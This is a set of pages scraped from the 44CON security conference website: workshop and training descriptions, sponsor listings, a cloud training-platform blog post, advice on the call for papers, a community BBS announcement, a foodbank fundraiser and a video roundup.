          In this introductory tutorial you will learn to fight real-world Linux malware that targets server environments. Attendees will have to find malicious processes and concealed backdoors in a compromised Web server.

          In order to make the tutorial accessible for a range of skill levels several examples of malware will be used with increasing layers of complexity — from scripts to ELF binaries with varying degrees of obfuscation. Additionally, as is common in Capture-The-Flag information security competitions, flags will be hidden throughout the environment for attendees to find.

          Requirements:

          • Good understanding of Linux server systems (userland)
          • Laptop with a Linux native system or a Linux virtual machine
          • Pre-installed tools: text-editor, OpenVPN client, gdb
          • Optional: ipython, IDA Pro (proprietary)

          Skills to acquire:

          • Live system incident response and forensics using Linux’s standard tool
          • System hardening
          • Inroduction to reverse-engineering obfuscated scripts and binaries

          Managing Incidents with CyberCPR

          Presented By: Steve Armstrong 

          CyberCPR provides a secure environment for incident responders to discuss incidents, exchange files, review incident progress, provide automated analysis of evidence items and a range of other time-saving features based on practical experience.

          This will be a hands on workshop, with students participating actively, accessing the demo CyberCPR system, creating incidents and adding evidence. In the workshop we will show the various aspects of the tool and how to get the most from it.

          During this workshop we will explain the background security of the system, the integrity monitoring of the database, the file encryption of all evidence in the file vault and how sensitive incidents (unauthorized internal data access or child pornography) can be processed on the same system.

          At the end of the workshop the attendees will have a good understanding of the capability of CyberCPR and how to operate its key features. They will leave with a VM of the CyberCPR ready to run on a laptop of their choosing.

          #####EOF##### Previous Speakers – 44CON

          Previous Speakers

          Our CFP for 44CON 2016 is now closed and the speakers have been selected.

          If you want to speak at one of our events, please check this site regularly, follow us on twitter or subscribe to our mailing-list for announcements and updates regarding our CFP.

          Speakers who have presented at 44CON, 44CON LONDON and 44CON CYBER SECURITY:

          A big thank you to all of them!

          #####EOF##### 44CON Sponsors – 44CON

          44CON Sponsors

          If you would like to sponsor 44CON 2019, our 44CON 2019 Sponsor Pack provides all the information you will need about sponsoring the conference. If you have any questions, please email Sponsor Ops who will be happy to help.

          Last year’s sponsors, at 44CON 2018.

           

          Gold Sponsors

          BT

          www.bt.com

          HackerOne

          www.hackerone.com

          Tenable

          www.tenable.com

          Silver Sponsors

          Microsoft

          www.microsoft.com

           

          Crowdfense

          www.crowdfense.com

           

          Exhibitors

          Bugcrowd

          www.bugcrowd.com

          Botprobe

          botprobe.co.uk

          Google

          Google

          google.com

          Tigerscheme

          www.tigerscheme.org

          Twitter: @tiger_scheme

          CheckSec

          www.checksec.com

          SuperAwesome

          www.superawesome.tv

          safepass.me

          safepass.me

          Cortex Insight

          cortexinsight.com

          Event Supporters

          Integrity

          www.integrity.pt

          Community Sponsors
          crest-new

          CREST

          www.crest-approved.org

          ISSA-UK

          ISSA-UK

          www.issa.org

          RawHex

          rawhex.com

          OWASP

          www.owasp.org

          Event Partners
          #####EOF##### 44CON Training | Sense/Net

          Tickets for 44CON Training

          Please visit 44CON Training pages for more information.

          Follow us on twitter and subscribe to our newsletter for announcements and be first informed when tickets are up for sale.







          #####EOF##### Share a link on Twitter

          Share a link with your followers

          New to Twitter?

          Get instant updates from your friends, industry experts, favourite celebrities, and what's happening around the world.

          What is Twitter? Learn more.

          #####EOF##### Building a cloud security training platform – Pt 2: Infrastructure As Code – 44CON

          Building a cloud security training platform – Pt 2: Infrastructure As Code

          This is a guest post by one of our trainers, Paul Schwarzenberger. Paul is running the fantastic Cloud Security and DevSecOps training course this June. He also has a blog where he talks about AWS, Cloud Security and DevSecOps. This is part of a series on how he’s built a platform to make things easier for those attending his training. Part 1 is available here. Thanks, Paul!

          The Cloud Security and DevSecOps training course I’m delivering for 44CON in June includes AWS, Azure and GitHub accounts which the students use so they don’t need to create their own. As I described in my last blog post I also decided to build a training platform, so that students can connect to a virtual desktop in the cloud with all the software they need pre-installed.

          That way they can come on to the course with any laptop or even tablet which supports the Amazon WorkSpaces client.

          The next step after the proof of concept and design was to build it using as much automation as possible – to keep cost low, I wanted to easily destroy everything as soon as a course finished, and to rebuild just before starting the next one.

          I’m also taking the opportunity to demonstrate good security practice, and I’ll use the training environment as an example to show students during the course.

          An important security principle is segregation, so I decided to build the training environment in its own AWS account. But I didn’t want to have yet another monthly bill. So I used AWS Organizations to create the new account:

          That way, billing for all my AWS accounts is consolidated, and I can also use Service Control Policies to enforce security policies on the new account.

          The next step was to create the AWS Directory Service – this is an AWS managed Active Directory which I’ll use to manage user identities, for students to log on to their Amazon WorkSpaces virtual machines. I decided to use Terraform by Hashicorp, as it’s ideal for automating infrastructure as code:

          Here’s an example of the code snippet used to create the AWS Directory service:

          My terraform code included nearly all the required resources:

          • VPC, DMZ and private subnets in multiple availability zones, subnet routes
          • Network Address Translation (NAT) gateways and Internet gateway
          • Key and key alias in AWS Key Management Service
          • Virtual machine instance for Active Directory admin, security group and Elastic IP
          • Amazon Route 53 domain name for AD Admin virtual machine Elastic IP
          • Identity and Access Management (IAM) policy and role for AD admin virtual machine
          • AWS System Manager templates for domain join and Windows feature setup
          • Secrets in AWS Secret Manager for user passwords – more on this later

          The one exception is Amazon Workspaces, as these are not supported by Terraform at the time of writing.

          I typed “terraform apply” and about 30 minutes later the infrastructure was built in the new AWS account, and I could see all the resources in the portal. Here’s the AWS Directory service built from the code snippet above:

          After some troubleshooting, I succeeded in automating the domain join of the AD Admin Windows Server 2016 virtual machine, using an AWS Systems Manager document template. I also created some automation templates to set up the Windows feature for Active Directory administration tools, and to install the AWS PowerShell Module, so I could use these later.

          Then, I logged in to the AD admin virtual machine using Microsoft Remote Desktop with my domain admin credentials:

          Opening Active Directory Users and Computers, I could see the AWS Directory domain.

          All I needed now was some automation scripts to create users, and then build the Amazon Workspaces. I’ll cover these in my next post.

          #####EOF##### Matt Lorentzen – 44CON

          Matt Lorentzen

           

          mattlorentzen Twitter : @lorentzenman
          Matt has 20 years IT industry experience working within government, military, finance, education and commercial sectors. He is a senior security consultant and penetration tester at SpiderLabs with a focus on red team engagements.
          Before joining SpiderLabs, he worked with Hewlett Packard Enterprise as a CHECK Team Leader delivering penetration testing services to a global client list. Prior to HPE, Matt ran his own IT consultancy company for 7 years.Matt will present at:

          #####EOF##### hackingforfoodbanks – 44CON

          Making Britain a Better Place For The Most Vulnerable

          “You measure the degree of civilization of a society by how it treats its weakest members.”

          This quote has been attributed in various forms to historical figures from Pope John Paul to Dostoevsky, Churchill and even Gandhi. It is a commonly held British value that we should treat others how we’d wish to be treated.

          The UK’s food poverty crisis has been getting worse for the best part of a decade. From austerity to universal credit, by that quote above our society’s score is dropping like a stone. This year we’ve come together to support the Trussell Trust and Hammersmith & Fulham Foodbank. It’s an initiative we’re calling Hacking For Foodbanks, that will continue beyond 44CON. While it’s been founded by 44CON crew, we want it to be bigger and separate to 44CON. Food poverty is a national problem and we need your help to help those that need it the most. Hacking For Foodbanks has a 4-point plan to make an impact on UK food poverty through cybersecurity and the tech industry, which you can read more about here.

          Help us raise money at 44CON

          We want you to bring your (working) retro, old and cool tech that you’re willing to part with as part of a bring and buy sale operated by Hammersmith & Fulham Foodbank and the Trussell Trust. We’ll provide tags so you can set a suggested price for your donated goods, and people can come along to the Trussell Trust table and put in an offer. Got a reasonable-sized retro-battlestation like a Rubber keyed spectrum? Fantastic! WPA injection wifi cards and Hayes serial modems? Super! We’re ideally looking for bric a brac others would want to buy at £5-£50 in suggested value.

          Anything that doesn’t get sold can be picked up by the people that dropped it off, or alternatively we’ll donate the kit to similar activities at other UK events.

          We’re also offering people the opportunity to make a donation to the initiative both at the event and when they buy a ticket, or register for the free open evening.

          All funds raised will be split 50/50 between Hammersmith & Fulham Foodbank and the Trussell Trust, in order to support foodbank activity in Fulham and across the UK.

          Get involved

          We’re also looking for people to take part in our mentoring scheme, to be piloted in early 2019. In particular we want people from non-technical as well as technical fields, particularly where a university degree isn’t required. We want to raise awareness for foodbank users that there are career opportunities out there, from sales and recruiting to technical jobs. We want to bring these opportunities to interested and able foodbank users and help them when they need a hand the most. Most important of all, we want to eliminate UK food poverty, one family at a time. If you’d like to help, wherever you are just drop us an email.

          #####EOF##### Teile einen Link auf Twitter

          Teile einen Link mit deinen Followern

          Neu bei Twitter?

          Erhalte Updates von deinen Freunden, von Prominenten und Unternehmen, und erfahre, was es Neues in der Welt gibt.

          Was ist Twitter? Mehr erfahren.

          #####EOF##### news – 44CON

          How to game the 44CON CFP

          Every year 44CON has a Call For Papers (CFP). The CFP is run by a panel of about 10 people from various parts of the industry, predominantly based in the UK. The process and technologies used have changed over the years, most notably last year when we replaced our existing bespoke CFP system with HotCRP and implemented a weighted average scoring mechanism based on HotCRP voting results.

          TL;DR – I want to speak at 44CON

          Ok, then do these things to boost your chances:

          1. Submit a workshop with your talk
          2. Make it clear where else you’ve submitted and/or might/will submit
          3. Include links to other talks you’ve done, video if you have it
          4. Get your talk in early for a better chance of scoring higher
          5. Be enthusiastic, tell us of any boundaries, problems or needs, and work with us, not against us

          Understanding how the CFP works

          The CFP is opened on a particular date for submissions. Everyone speaking in Track 1 or 2 must go through the CFP process. Track 3 (which is sometimes used for workshops) is a little more fluid, for reasons I’ll discuss later.

          Scoring and voting

          A gypsy fortune teller brings her crystal ball to life to read the future.
          Scoring is as much an art as science, but you can improve your chances of speaking at 44CON.

          Our panel votes on and scores talks out of 5, normally in several tranches. It varies by individual and not everyone votes on every talk. People provide comments and feedback, which we pass onto those submitting on request. On average we get between 200-400 submissions a year.

          When the CFP is due to close, we push panel members along to review and score submissions, particularly if they haven’t yet been voted on.

          Once voting is complete, we divide the sum of scores from each voter by the number of voters to get an average, with an option for discussion under certain circumstances that can weight a score by up to + or – 0.5.

          UK submissions normally get up-voted (with some exceptions, see below), and in the selection rounds there’s a strong bias towards UK-based speakers over non-UK-based speakers with identical scores, unless the non-UK-based speaker’s talk is exceptional in other ways. This doesn’t mean that your talk will be rejected if you’re not based in or from the UK. Non-UK based speakers make up the majority of our speakers, but there is definitely a small “home bias” amongst the panel members based in the UK.

          Why does it take so long to find out if I’m accepted?

          If you're not sure what's happening, contact us and we'll give you an update.
          If you’re not sure what’s happening, contact us and we’ll give you an update.

          Once we have the results we look to fill a specific number of slots, which varies each year. Acceptance messages are sent out in tranches, and when people return the speaker agreement, they’re confirmed. We normally send rejections for very low scoring talks, but there’s a glut of talks usually falling between 3.5-4.0, where they might be accepted if others scoring higher can’t make it.

          If you’ve scored an average of 5.0, you’re pretty much guaranteed a slot and we’ll get in touch straight away. The bulk of submissions tend to hover around a score of 3-4, and 4.5 is normally the cut-off point for the first tranche of accepts. We then wait till the first tranche come back, or if we get no response, chase them up twice before moving on.

          For the slots that free up, we move down the list, ensuring those who scored highest get picked first. Once we’ve filled up tracks 1 and 2, we move on to track 3.

          After the first round of talk triage, cut-off tends to happen around average scores of 4.25 – 4.0/5.What this means is that there are a lot of good talks that just don’t get accepted at 44CON because we don’t have the space to support them, even with a third track. More often than not a talk or workshop rejection from 44CON does not mean it sucks. Ask for feedback and we’ll share what we can.

          Wait, isn’t 44CON a two-track conference?

          All speakers dress like this when preparing submissions.
          All speakers dress like this when preparing submissions.

          Yes and no. For several years we’ve run a hidden track under various names. This is because we’ve wanted to give our backup speakers a chance to speak if someone drops out, but we don’t want to risk slots emptying on the main tracks. Inevitably people drop out along the way, people who are allocated to track 3 move onto the main tracks and this leaves gaps that we have the option to fill.

          Sometimes we’ll look back at the talks list and look to offer a spot to someone on the list, however sometimes it’s easier to go to people we know are definitely coming and see if they have something. This is a completely arbitrary decision affecting two slots a year at most, and more often than not, 10-20 people want the slots. We generally operate on a first come, first serve basis.

          Hacking the process

          Now you know how the process works, let’s look at how you can subvert it to ensure your talk has the best chance of scoring high. Each voter on the panel is different, but there are certain things that, on average, will result in you being more favourably considered.

          Submit both Talks and Workshops

          We have 2-3 tracks to fill with talks, and get on average 200-400 submissions a year. We get less than 20 workshop submissions a year. Workshops are 2 hours long and come with an extra night’s accommodation when talks are also submitted.

          If you want to maximise your chances of speaking at 44CON, submit a workshop.

          Workshops are typically more intimate affairs with room for about 30-50 people sitting down, although we have had workshops with 100 people. If you’re not sure what to do in a workshop, imagine that if your main talk is about the theory, try a play-along walkthrough on how to do this in practice.

          Every year we’ve run a formal CFP process, we’ve treated people who submit workshops far more favourably than people who submit talks alone. Even if your workshop is unrelated to your talk, both are likely to be up-voted considerably.

          I cannot stress this enough. If you want to maximise your chances of speaking at 44CON, submit a workshop.

          This only works if you submit your workshop separately to your talk. People submitting a talk and workshop in one don’t get the voting benefit separate talk and workshop submissions do. Finally, if you’re only prepared to come if your talk is accepted, please say so on both submissions.

          Tell us where else your talk has been submitted

          44CON is usually among the first events in the calendar after BlackHat and DefCon. Everyone wants to speak in Vegas, we understand that. Some people score BlackHat and DefCon talks slightly lower in order to give preference to newer talks, some don’t. It’s down to the panel. If you don’t tell us you’re talking at BlackHat or Defcon, and we find out by checking the site, panel members will remember next year and it may affect future submissions.

          If you’re doing your reveal in Vegas, focus on your process at 44CON.

          Not everyone in the UK can go to BlackHat or Defcon, so there’s not a massive deal in your talk being done in the UK afterwards. We do need to know what will be different. It takes a lot of effort to deliver a big Vegas talk, and making something different may seem like an awful lot of effort, but there’s an easy workaround that normally gets big bounces.

          If you’re doing your reveal in Vegas, focus on your process at 44CON. If you spent 6 months trying to reverse engineer and compile code for an arcane architecture, we want to know how you went about it. We also appreciate failures as much as successes. Some of our better talks have been talks about how people have failed and what they learned.

          If your talk is 70% different to your Vegas talk, say so. If it’s 50%, say so. If it’s 30%, say so. If you say so, and it’s not, then reviewers will know next year.

          Show us your other talks

          A picture speaks a thousand words, but a video of your talk lets the panel look at the type of speaker you are, how you approach your talks, and gives us an idea of where we think you might fit in best.

          Show us your other talks, even if you're a rockstar.
          Showing us your other talks helps us fit you in.

          This is an especially powerful tool for speakers coming from countries where English is a second language. All of our talks are delivered in English. We have some great speakers from across Europe, India and even China, and we want to keep the focus on the content, not on the way it’s conveyed.

          It can be pretty scary delivering a talk in a second or third language, and it’s useful to see you speak, both to reassure voters when you’re delivering a talk, and to determine what help we might be able to offer if your research is brilliant, but you struggle with the language.

          Even if you’re a native English speaker, throwing us a link to earlier talks lets us work out where and when we can put you. We often put more energetic speakers on in the afternoon for example.

          Submit your talks early in the process

          Most of the panel vote in several stages. Almost everyone votes for the first submissions coming in, and slowly dribble off after a while. At several points while the CFP is open, more people will vote, but because there are fewer talks to vote on, we’ve noticed that early talks score higher on average than those submitted later.

          The more votes you get, the better the chance of bringing your voting average up and the better the chance of your talk being accepted. Submitting early gets you more (and often higher) voting scores.

          Remember It’s A Two-Way Street

          We completely understand how much of an effort you put in to come to speak at 44CON. Many of the crew talk at conferences themselves, and understand that you’re giving your time for free to go and speak at an event. That’s why we try to make the talk as cost neutral as possible for you to come and present. When people interact more with the event, and try to get involved, they’re generally more likely to have more positive responses.

          There are certain speakers who come back to 44CON regularly such as Jerry Gamblin, Saumil Shah and Joe Fitzpatrick amongst others, all of whom make really strong efforts to interact with the crew and those attending. If, in your submission, you come across like you’re treating 44CON as just another con to shop the same talk around and disappear, you’re probably going to score lower than someone who comes across as though they really want to be there.

          Coping with rejection

          Our scoring method is not without its faults. No scoring system is perfect, and we’ve had to break bad news to big names as well as people with talks some of us thought were brilliant fits for the event.

          If you don't hear from us straightaway, wait or contact us, don't assume your talk was rejected.
          If your talk was rejected, it’s not an indictment of you or your talk.

          To help you deal with the sting of rejection, remember this:

          1. Your talk not being accepted at 44CON does not mean we thought it was bad.
          2. You absolutely have the right to ask for feedback. It might take a while depending on when you ask, but Steve will personally write back to you with as much detail as he can provide.
          3. We’re all here to learn. If you think that we’ve made a mistake, or have ideas on how we can improve (beyond “accepting my awesome talk next time, dumbasses”), then we want to know.

          Most importantly, your talk not being accepted does not mean we don’t want you to come and enjoy 44CON. We absolutely do want you to come, and will happily offer you a discount on a ticket as a thank you for submitting.

          We want everyone to have a good time at 44CON. If you have any special needs or requests, from assistance with disabilities to being able to bring your kid(s) along just let us know. Unless it’s something we absolutely cannot accommodate, it will have no bearing on your submission’s consideration.

          #####EOF##### community – 44CON

          Building A Permanent Community At 44CON

          44CON’s always been the kind of place where you turn up, hang out with friends old and new, get your head bent then go home and get on with your life. But we want to do more than that. We’re building a permanent community for everyone, whether you come to 44CON or not. We’re also mostly old(er Steve, damnit! – A) and riddled with nostalgia. Instead of using Snapbook, or Slickchat or whatever the cool kids use, we thought we’d build a traditional Bulletin Board System and drag it kicking and screaming into the modern age.

          To say this was a bad idea was an understatement. Our first attempt used a hodge-podge of Docker, a piece of DOS-based software last updated before the average attendee was born and one instance of a DOS emulator per connection. It worked, but was telnet only (thanks to the joys of serial emulation) and was very, very unstable.

          In the end we settled on a modern BBS implementation that has a learning curve almost as steep as Radare2, but allows us to do cool modern things, like provide access over SSH and HTTPS. Originally we worked on supporting older platforms like the BBC Micro, C64 and ZX Spectrum, but everything old struggled with newer software, and everything new struggled with older software.

          Finally, we have something we think you’re going to love. Registration will open on the 12th of September. May we present the official 44CON rumour mill, Juicy HQ:

          Screen Shot 2018-08-29 at 20.37.05

          For those of you who’ve never used a BBS before, the first thing you need to know is that you apply for an account (register). Once you’ve filled in a form, you’ll be taken to the new scan screen. This is to check for updates since you last logged on. There are public and private message areas, file uploads (check out our collection of classic British hacking textfiles, or our PoC||GTFO archive) and you can play multiplayer old-school BBS games courtesy of our DoorParty setup. If things seem a little less interactive, remember that BBSes were typically built to serve very few, if any concurrent users, and most content was downloaded in batches for later offline use.

          Screen Shot 2018-08-30 at 11.24.12

          Screen Shot 2018-08-30 at 11.14.03Most British people never really got to use dial-in BBSes back in the day due to BT’s monopoly and pricing, although Prestel and Micronet had some popularity. There was one information system that every British person had access to, which was Teletext. On the BBC, we had Ceefax. So we built our BBS around a Ceefax theme, although you might spot the odd reference to Teletext classics such as Bamboozle and even Digitiser. And yes, all of this is accessible in a web browser.

          Screen Shot 2018-08-29 at 20.37.41

          Although Juicy HQ is the official 44CON BBS, it’ll be open to everyone from the 12th of September. Whether you’ve been to 44CON or not, live in the UK or not, or if you’ve never been to a conference before, all are welcome providing Wheaton’s law is followed at all times.

           

           

          Screen Shot 2018-08-29 at 20.38.33

          We’re still refining Juicy HQ in preparation for launch, but we’re making sure there’s plenty of easter eggs for you to find. If you’re interested in beta testing the BBS, give Steve a shout on twitter or mastodon and he’ll hook you up.

          #####EOF##### Een link delen op Twitter

          Een link delen met je volgers

          Nieuw op Twitter?

          Ontvang directe updates van je vrienden, zakenexperts, je favoriete beroemdheden en wat er gebeurt in de wereld.

          Wat is Twitter? Meer informatie.

          #####EOF##### Facebook
          Meld je aan bij je Facebook-account om te delen.
          Nieuw account maken
          #####EOF##### 44CON 2018 Sponsors – 44CON

          44CON 2018 Sponsors

          More sponsors will be added as they are confirmed, please check regularly. If you would like to sponsor 44CON 2018, our 44CON 2018 Sponsor Pack provides all the information you will need about sponsoring the conference. If you have any questions, please email Sponsor Ops who will be happy to help.

           

          Gold Sponsors

          BT

          www.bt.com

          With operations in over 180 countries supporting some of the world’s largest companies, nation states and critical national infrastructures, we have a unique perspective on cyber crime. Our front line position means that we see how and where attacks come. We’re constantly watching, learning, predicting and responding to the latest threats to protect our customers and BT.

          We know that a cyber attack can destroy a reputation overnight. We also know that security is the number one digital enabler, allowing a business to run at speed and to build customer trust and investor confidence.

          So we’ve built a team of 2,500 security experts in 14 global centres. It’s the same people who protect our business who also protect yours. This team use unique tools and insight to stay one step ahead of criminal entrepreneurs.

          As a global leader of Managed Security Services, we’re helping customers thrive in a digital world, by delivering world-class security solutions. These are underpinned by our professional services support, cloud of clouds strategy and excellent customer service.

           

          HackerOne

          www.hackerone.com

          The most trusted hacker-powered security platform
          HackerOne was started by hackers and security leaders who are driven by a passion to make the internet safer. Our platform is the industry standard for hacker-powered security. We partner with the global hacker community to surface the most relevant security issues of our customers before they can be exploited by criminals. HackerOne is headquartered in San Francisco with offices in London and the Netherlands. Investors include Benchmark, New Enterprise Associates, Dragoneer Investments, and EQT Ventures.

           

          Tenable

          www.tenable.com

          Tenable®, Inc. is the Cyber Exposure company. Over 24,000 organizations around the globe rely on Tenable to understand and reduce cyber risk. As the creator of Nessus®, Tenable extended its expertise in vulnerabilities to deliver Tenable.io®, the world’s first platform to see and secure any digital asset on any computing platform. Tenable customers include 53 percent of the Fortune 500, 29 percent of the Global 2000 and large government agencies. Learn more at tenable.com.

          NCC Group

          www.nccgroup.trust

          NCC Group is a global expert in cyber security and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape.
           
          With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate & respond to the risks they face.
           
          We are passionate about making the Internet safer and revolutionising the way in which organisations think about cyber security.
           
          Headquartered in Manchester, UK, with over 35 offices across the world, NCC Group employs more than 2,000 people and is a trusted advisor to 15,000 clients worldwide.

          Silver Sponsors

          Microsoft

          www.microsoft.com

          Microsoft (Nasdaq “MSFT”) is the worldwide leader in software, services, and solutions that help people and businesses realise their full potential. Microsoft remains dedicated to software security and privacy and continues to collaborate with the community of people and technology organisations helping to protect customers and the broader ecosystem.

           

          Crowdfense

          www.crowdfense.com

          Crowdfense evaluates, tests and improves state-of-the-art active cyber-defense capabilities from the most talented Researchers in the world and offers them to a carefully selected group of global institutional Customers.

           

          Exhibitors

          Bugcrowd

          www.bugcrowd.com

          Bugcrowd delivers the ultimate in security assessment for the enterprise. The pioneer and innovator in crowdsourced security testing for the enterprise, Bugcrowd combines the power of more than 80,000 security researchers and its proprietary Crowdcontrol™ platform to surface critical software vulnerabilities, and level the cybersecurity playing field. Bugcrowd provides a range of public, private, and on-demand options that allow companies to commission a customized security testing program to fit their specific needs.

          Botprobe

          botprobe.co.uk

          Botprobe Ltd is a University-based, part government funded, state-of-the-art research project tackling big data issues within threat detection. Botprobe has shown to reduce traditional packet capture by up to 97% of data volumes in use in areas such as legal interception, PCAP indexing, pre-incident forensic data capture and improved reaction times to threats. We are developing threat specific IPFIX templates for focused data capture in botnets, spam, ICS malicious behaviour and malicious HTTP requests. We are looking for collaboration, funding and case studies in projects involving threat data when volumes are proving prohibitive in threat analysis.

          Google

          Google

          google.com

          Do you like to break things — and then fix them? Does working at massive scale on a stunning array of technologies appeal to you?
          Join Google Security & Privacy Engineering to build secure software solutions that keep Google and its billions of users safe, secure, and happy. Learn more at: g.co/SecurityPrivacyEngJobs

           

          Tigerscheme

          www.tigerscheme.org

          Twitter: @tiger_scheme

          Tigerscheme is a commercial certification scheme for technical security specialists, backed by University standards and covering a wide range of expertise.

          Tigerscheme was founded in 2007, on the principle that a commercial certification scheme run on independent lines would give buyers of security testing services confidence that they were hiring in a recognised and reputable company.

          Tigerscheme provides for career progression through entry level certification, intermediate level certification, and senior and technical specialist roles. Certification under Tigerscheme provides a formal recognition of an individual’s skills, and is awarded on the basis of a rigorous independent assessment against published and widely-accepted standards.

          CheckSec

          www.checksec.com

          Canopy: Make Reporting Great Again!

          Writing reports shouldn’t be hard. But for most of us, it’s a pain and the least fun part of our job. Canopy doesn’t make reporting fun, but it does make it a whole lot easier. 

          Stop by to say hello. Stay for a demo. 

          CheckSec: builders of Canopy and proudly sponsoring 44CON since 2012!

          SuperAwesome

          www.superawesome.tv

          SuperAwesome is the world’s largest kidtech company, pioneering technology which delivers digital media functionality with a ‘zero-data’ design to ensure total safety for kids.
          Our private-by-design technology is used by hundreds of brands and content-owners to safely engage with over 500M kids every month.
          In 2018 SuperAwesome was ranked as the #1 technology growth company in the UK by the Financial Times.

          If you’re interested in joining our mission to make the internet a safer place for kids, taken a look at our careers page – we’re hiring in all territories now.

          safepass.me

          safepass.me
          The Human Element is always the weakest link in an organisation’s chain of safety. With safepass.me we help you both achieve and exceed your security goals AND say goodbye to frustrating and complex password policies. Deploying safepass.me will help your security team to sleep at night, reduce the frustration of your users and lower the number of helpdesk tickets related to password resets.

          Cortex Insight

          cortexinsight.com

          Identify. Prioritise. Remediate.

          • Automation – Processes and consolidates pentest, vulnerability reports
          • Move Security Left – Easily integrate security into the application development process at an earlier point
          • Security as a Srevice –  Accessible to the entire project team
          • Risk Reduction – Measure the success in your vulnerability management through risk reduction instead of quantities of fixed issues

          For more information or to request a demo contact: info@cortexinsight.com

          Or come and speak to us at 44CON 2018

          Event Supporters

          Integrity

          www.integrity.pt

          INTEGRITY is an ISO 27001 certified and CREST member company. Our vision is to deliver worldwide innovative Information Security services on Auditing and Consulting where we provide our full expertise on the structuring and delivery of InfoSec value- added services, combining our expertise and our proprietary GRC Technology for a consistent and effective cyber risk reduction process for our clients. Such comprehensive services include persistent Pen-Testing (www.keepitsecure24.com), ISO 27001 (www.27001manager.com) and Third Party risk management (www.infosecrating.com) solutions supported by our GRC Platforms (www.integritygrc.com).

          Community Sponsors
          crest-new

          CREST

          www.crest-approved.org

          CREST is the not-for-profit accreditation and certification body representing the technical information security industry. CREST provides internationally recognised accreditation for organisations and individuals providing penetration testing, cyber incident response and threat intelligence services.

          All CREST Member Companies undergo regular and stringent assessment; while CREST qualified individuals have to pass rigorous examinations to demonstrate knowledge, skill and competence. CREST is governed by an elected executive board of experienced security professionals who also promote, develop and support awareness, ethics and standards within the cyber security marketplace.

          Follow us on Twitter: @crestadvocate

          44CON was a community sponsor of the CRESTCon & IISP Congress Conference and Exhibition  that took place on 3rd May 2018 at the Royal College of Physicians in London.

          ISSA-UK

          ISSA-UK

          www.issa.org

          Welcome to ISSA-UK, the UK Chapter of the ISSA. With active participation from individuals and chapters all over the world, the Information Systems Security Association (ISSA) is the largest international, not-for-profit association specifically for information security professionals. Having welcomed over 1,800 members since our beginnings in 2003, the ISSA-UK Chapter is the world’s most successful chapter. At only $95 per year for membership, we offer the most value out of any security association globally.

          RawHex

          rawhex.com

          Last year’s 44CON badge was based on the HIDIOT by Raw Hex which teaches microelectronics and programming. This year Raw Hex has designed 44COIN, the world’s first physical virtual cryptocurrency powered by the ROPChain and Proof of Alcohol consensus model. Your 44COIN kit will be in your attendee bag. Take it to the soldering area, build it and join the cryptocurrency revolution!

          OWASP

          www.owasp.org

          The Open Web Application Security Project (OWASP) is a 501(c)(3) worldwide not-for-profit charitable organization focused on improving the security of software. Our mission is to make software security visible, so that individuals and organizations are able to make informed decisions.

          Event Partners

          Antipøde

          www.blackandwhitecoffee.co.uk

          Having spent many years in Brisbane, Australia, behind the machines in a few of its most renowned coffee hangouts – Harvey’s (under chef PJ McMillan), Au Cirque and The Little Larder – it became quickly apparent after moving to London that the city was crying out for the simple things in life, like a good flat white.

          Our Raison d’être is simple: to provide the London public with the quality and standards associated with Australian coffee culture.

          ESW Solutions

          www.eswav.com

          Founded in 1995, ESW Solutions has quickly become a major force in the Audio Visual industry – building on its first class reputation for customer service, quality and commitment. From a large multi room European conference to a small meeting we have the experience to make your event successful. We also produce live events for a wide range of clients, Awards Ceremonies, Talent Competitions, Festival Stages etc.

          ESW is also the home to Talking Slides a unique product that gets content presented at your conference online and ready to view in a simple, cost-effective and hassle-free manner. We attend your event and capture the presentations as they happen. However, the recording of your event is just the beginning.

          We take the high-definition presentation recordings and host them within our Talking Slides management system, complete with search facilities, registration options and even pay-per-view access.

           

          #####EOF##### DSC_4836-1 – 44CON

          DSC_4836-1

          #####EOF##### First Videos From 44CON 2018 Up – 44CON

          First Videos From 44CON 2018 Up

          For a long time we used to sell access to videos on Vimeo. Recently we moved back to making videos freely available on YouTube. Due to some last minute issues with 2018 we had to do a bit more work to get the 2018 videos to a point we were happy with. However, in 2019 the wonderful Ministraitor will be supporting our videos, and we’ll be able to provide them for free from now on. The first 5 videos from 2018’s 44CON are now ready to go, so read on for the vids and our thoughts.

          First up we have Mike Gianarakis and Shubham Shah’s Catch Me If You Can. Mike and Shubs have been working on ephemeral vulnerabilities for a while, and this is a great run-down of both ephemeral bugs as a class and some of their work in the bug bounty space in general.

          Guy Barnhart-Magen and Ezra Caltum talk about hacking Machine Learning, from bias and algorithms to exploiting Remote Code Execution bugs in ML frameworks.

          Much-loved 44CON regular Saumil Shah recovers from an rm -rf incident to deliver a great talk on advanced ARM Shellcode techniques. Expect constrained shellcode with lots of polyglot tricks along the way.

          Timo and Tomi knock it out of the park with their tale of extreme lockpicking. Over a decade these advanced persistent researchers started pulling hotel locks apart. What they found is hilarious, entertaining and downright disturbing. Truly, the industry’s Penn & Teller, only the smaller one talks!

          Jack Matheson shows us the future of networking, and how SmartNICs can help secure the datacentre of the future. We look forward to talks on hacking and backdooring SmartNIC implementations, but this rare (for 44CON) optimistic talk is one to watch.

          We’ll have more videos from 2018 up soon. Don’t forget to subscribe to our YouTube channel to catch them as they come out!

          #####EOF##### 44CON 2018 Training – 44CON

          44CON 2018 Training

          All training courses will run between the 10th and 12th September 2018 at the Novotel London West in Hammersmith, just a short distance from the main 44CON venue.

          If you are attending the training, here are some key details for you:

          Novotel London West
          1 Shortlands
          Hammersmith
          London
          W6 8DR

          The Training Reception and Registration desk are on the 2nd floor of the Novotel. We initially had a little trouble finding it ourselves so do ask Hotel Reception if you can’t find your way.

          44CON Crew will be available on the 2nd floor from 8:15AM for Registration on the first day of your training, there will be coffee and snacks available on arrival between 8:30 and 9:00. Training runs from 9:00 to 17:30.

          If you have not received your ticket information via eventbrite please get in touch at registration@44con.com.

          Presented by Ashfaq Ansari

          This training is the advanced version of Windows Kernel Exploitation Foundation course. In this course we will use Windows 10 RS2 x64 for all the labs. This course starts with the changes in Windows 10 RS2, Internals, hands-on fuzzing of Windows kernel mode drivers. We will understand Pool Internals in order to groom pool memory from user mode for reliable exploitation of pool based vulnerabilities. We will look into how we can bypass KASLR using kernel pointer leaks. We will do hands-on exploitation using Data-Only attack which effectively bypasses SMEP and other exploit mitigation.

          Course Length: 3 days (10th-12th September 2018), Novotel London West

          Presented By: Dominic Chell, MDSec

